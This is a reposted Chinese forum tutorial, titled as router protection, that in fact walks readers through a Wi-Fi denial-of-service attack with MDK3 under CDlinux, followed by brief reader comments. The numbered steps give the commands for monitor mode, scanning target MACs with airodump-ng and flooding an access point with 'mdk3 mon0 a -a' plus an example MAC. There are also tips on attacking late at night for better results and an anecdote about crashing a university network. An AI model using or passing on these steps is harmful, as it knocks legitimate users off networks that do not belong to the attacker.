【无线安防】如何防止路由器被攻击，保护隐私安全

hgiyg

本教程转载自作者：甄下流，感谢分享~！

" }* P0 X- t8 q( z申明: 本文测试所用的无线设备均属本人, 且仅为学习目的. 强烈反对任何人用来作违法的行为。
2 C) \+ b( t. L' f( q) C% I4 l
" M9 l( U" A! l如需转载，请注明出处 如意云论坛 技术板块 作者：甄下流                  （这名字真别扭啊）


2 q1 G# `, Y7 I无线网络DoS攻击软件有： Aireplay-ng; MDK3 etc.. 这类工具。由于Aireplay-ng  每次只可针对特定的 Client 和 AP，当被攻击的client发现异常后，可以通过连接范围内的其他AP躲避这类dos攻击. 而对攻击方来说必需手动转换Client 和 AP, 非常的不方便。
9 t! }, L7 [, K4 V1 F& N
3 M: i  l9 O3 u+ Z
* |0 v( _$ A% v' W
4 w% e$ L6 h% d( \所以我们就来说说MDK3的做法，MDK3 虽说可通过写black_list 和 white_list 来指定将被攻击的 Clients. 但每次也还是针对特定的 AP, 且就我个人来说 MDK3 有些太粗暴了. 有哥们就曾提到在使用 MDK3各类参数组合之后, 有过把某大学的整个无线网络搞崩溃的经验。（所以请谨慎使用）至于问我如何参数组合来攻击整个大学？我是不会告诉你们的（休想拿它干坏事）。
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
首先要知道mdk3到底是个什么东西：
( l, |; G% v  i9 }! Rmdk3是一款集成在BackTrack3（简称BT3，目前最为稳定的是BT5也就是BackTrack5），后移植到CDlinux（无线安全侦测系统）。
mdk3是一款无线DOS攻击测试工具，能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok等模式的攻击，另外它还具有针对隐藏ESSID的暴力探测模式、802.1X渗透测试、WIDS干扰等等这类功能。（在这里我就不作过多说明，因为这涉及到linux系统的高级命令，这一贴只是教大家如何测试自家路由器的抗洪水能力）
3 a$ I% W  c$ Q0 U; `: _! J, o3 e; {5 u---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
以下教程开始：
* z8 E( |* ]% v! e" U/ ]9 l' g这一贴我只说说日常的攻击命令（其实攻击一般路由器来说已经足够），高级命令组合有些复杂我这就不说了。
1 ]% Y$ }+ W  |, a由于我用的是CDlinux，所以就在CDlinux下做教程。（BT系列软件下会有些地方不一样）
& K$ G9 a5 L0 n" \$ S4 B首先运行虚拟机，加载CDlinux。
1、开始菜单—终端模拟器
4 V3 ]- x7 h' a% e2 x2、输入 sudo mdk3 （注意空格）来运行mdk3
3、在mdk3中输入 sudo ifconfig -a 来侦测网卡
5 J6 K0 l- \/ o: x: R3 [) u0 z4、在mdk3中输入 sodu airmon-ng start wlan0 来模拟端口（其中wlan0要按你们实际情况来输入，网卡0就填wlan0，1就填wlan1）
5、在mdk3中输入  sudo airodump-ng mon0 来扫描MAC
6、扫描完后，按CTRL+C来停止
" x+ e9 k, v4 h! Q6 ]8 L% }* ^. |7 c7、在mdk3中输入  sodu mdk3 mon0 a -a MAC 来进行攻击（其中MAC不是指输入MAC，而是要输入你要攻击的MAC地址）
( S* V* x0 |( X5 u% P! X          例如：我要攻击的路由器的MAC是00:25:22:4A:E8:1B那么我就要输入 sodu mdk3 mon0 a -a 00:25:22:4A:E8:1B
8、攻击完成后，按CTRL+C来停止。
% m( V+ z5 V' W' ?
4 c3 }0 U+ g* r! }9 e; r; j% h
% D6 x/ \( w0 |* j9 U注：对于新版的CDlinux来说第一步是可以不用打开终端模拟器的直接点击左下角CDlnux图标，依次打开 无线安全 mdk3-v6 就可以~命令都是一样的


本次说的是mdk3的其中一种攻击模式，Authentication DoS mode又叫身份认证攻击，这其实是一种验证模式的攻击，攻击的效果是自动模拟出随机产生的MAC地址向目标AP不断发送验证请求，导致AP忙于处理过多的验证请求而停止正常用户的登录请求，使合法用户无法使用无线网络。（如果不重启路由器那么就会无法使用无线网络）
5 b. W  W' t' A-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
其实mdk3不止是有身份认证攻击还有Beacon Flood Mode、Deauthentication/Disassociation Amok Mode等攻击模式~~~都是些杀伤力大的所以在这里就不教大家了！
) A9 A, c7 U# p——————————————————————————————————————————————————————————————————————————————--

. g+ B6 R; y$ x" [
; @4 J7 Q& v3 u- o8 H3 x8 K' s注意：这个办法不是万能的，要更好的成功率请在深夜进行，因为深夜人们都关闭电脑了，而现在一般的电脑都

9 |) }2 Y) X" Z0 T0 w( {# j0 ?
* ^6 V9 F" [0 N0 l! X9 f# R有36X、金X、腾X管家等等，它们都有防洪水攻击的功能（所以你们懂的） ，由于现在的路由器防认证的效果都

% q9 W8 @9 a! N. A
) v7 q4 ~, K- D. f8 P7 j! ^不错，所以攻击的时间得看你家路由器的防洪水效果了！
. w2 i" s$ m& {: Z( E  B* g/ b. f9 Z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ P! o# q: u) P5 O以下是截图教程，步奏和上面的1—8步是一样的，不懂的可以看图：
% K0 V) h' E  Q. R7 W

9 b; B% r& q9 u: U2 Q3 }& J% e




4 a/ u( o- d# Y! T1 D

, d- I, H/ l, E4 U5 E+ P( T
8 c, e# }6 {' e
% O* w7 I/ o- ~8 n

6 K0 G; o  e! T+ w3 Y! E/ J9 I
, A4 w/ g' B5 ?2 e

' b' w$ J/ V- K1 b

tom96202

好文。我喜欢。

ycg9603

个人用户不至于吧，谁费劲攻击你？

wxdsd

谢谢分享,楼主好人